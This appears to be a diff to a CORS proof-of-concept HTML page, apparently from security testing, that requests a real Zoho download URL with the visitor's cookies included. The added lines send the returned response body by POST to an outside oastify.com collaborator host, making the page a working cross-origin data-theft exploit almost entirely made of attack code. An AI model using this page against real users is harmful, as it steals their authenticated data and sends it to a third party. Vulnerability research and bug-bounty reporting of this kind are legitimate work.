--- a/cors.html
+++ b/cors.html
@@ -4,19 +4,29 @@
 <h3>CORS PoC</h3>
 
 <script>
-var url = "https://download.zoho.com/webdownload?x-service=assistlab&event-id=3602439000000037002&x-cli-msg=eyJzY29wZSI6ImFzc2lzdCIsInpzb2lkIjoiOTA1MjQzMjI0IiwiZmlsZV90eXBlIjoiY3N2In0=";
+const targetUrl = "https://download.zoho.com/webdownload?x-service=assistlab&event-id=3602439000000037002&x-cli-msg=eyJzY29wZSI6ImFzc2lzdCIsInpzb2lkIjoiOTA1MjQzMjI0IiwiZmlsZV90eXBlIjoiY3N2In0=";
 
-fetch(url, {
+// Perform the request with cookies (if CORS allows it)
+fetch(targetUrl, {
     method: "GET",
-    credentials: "include"   // <-- send cookies cross-origin
+    credentials: "include"
 })
-.then(response => response.text())
+.then(res => res.text())
 .then(data => {
+
+    // Show in browser (for demo)
     document.write("<pre>" + data + "</pre>");
+
+    // Send the received response body to your own server
+    fetch("https://1suddm1853b8yg70a9rkktswxn3er6iu7.oastify.com/receive", {
+        method: "POST",
+        headers: {
+            "Content-Type": "text/plain"
+        },
+        body: data
+    });
 })
-.catch(err => {
-    document.write("Error: " + err);
-});
+.catch(err => document.write("Error: " + err));
 </script>
 
 </body>
